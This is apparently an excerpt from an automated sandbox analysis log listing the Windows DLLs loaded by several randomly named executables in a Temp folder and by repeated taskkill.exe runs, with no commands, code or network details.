Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
